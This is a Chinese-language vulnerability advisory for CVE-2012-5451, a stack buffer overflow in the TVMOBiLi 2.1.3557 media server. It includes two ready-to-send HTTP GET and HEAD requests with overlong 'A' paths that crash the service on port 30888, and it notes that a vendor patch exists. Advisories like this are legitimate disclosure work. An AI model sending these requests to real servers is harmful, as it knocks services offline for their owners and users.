发布日期:2012-12-07
更新日期:2012-12-11
受影响系统:
TVMOBiLi TVMOBiLi 2.1.3557
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56853
CVE(CAN) ID: CVE-2012-5451
TVMOBiLi是Mac, Windows, Linux上的自由UPnP/DLNA媒体服务器。
TVMOBiLi 2.1.3557及之前版本在处理"HttpUtils.dll"动态链接库内的URL长度时存在安全漏洞,远程攻击者可发送特制的HTTP GET请求(长度为161、257、255个字符)到30888/TCP端口,造成栈缓冲区溢出,使tvMobiliService服务崩溃。
<*来源:High-Tech Bridge
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
HEAD
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
建议:
--------------------------------------------------------------------------------
厂商补丁:
TVMOBiLi
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: